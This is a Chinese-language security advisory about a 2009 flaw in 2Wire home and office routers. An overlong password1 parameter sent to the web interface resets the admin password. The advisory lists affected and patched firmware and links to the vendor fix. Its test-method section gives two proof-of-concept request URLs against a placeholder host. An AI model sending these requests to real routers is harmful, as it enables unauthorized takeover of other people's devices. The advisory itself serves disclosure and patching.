发布日期：2009-08-12
更新日期：2009-08-17

受影响系统：

2wire 2071 Gateway 5.29.51
2wire 2071 Gateway 3.7.1
2wire 2071 Gateway 3.17.5
2wire 1800HW 5.29.51
2wire 1800HW 3.7.1
2wire 1800HW 3.17.5
2wire 1701HG 5.29.51
2wire 1701HG 3.7.1
2wire 1701HG 3.17.5

不受影响系统：

2wire 2071 Gateway 5.29.135.5
2wire 1800HW 5.29.135.5
2wire 1701HG 5.29.135.5

描述：

---

BUGTRAQ  ID: 36031

2Wire HomePortal和OfficePortal都是2Wire推出的小型路由器设备。

2Wire的Web接口没有正确地验证用户提交给xslt脚本的page=CD35_SETUP_01请求参数。如果远程攻击者提交了超过512字符的超长password1参数的话，就可以重置口令，并在下一次登录到路由器的时候提示新口令。

<*来源：hkm （hkm@hakim.ws）
  
  链接：http://secunia.com/advisories/36212/
        http://marc.info/?l=bugtraq&m=125009399117378&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://gateway.example.net?xslt?page=CD35_SETUP_01
http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&amp;password1=*Ax512*&amp;password2=*Ax512*

建议：

---

厂商补丁：

2wire
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.2wire.com/

浏览次数：2310
严重程度：0（网友投票）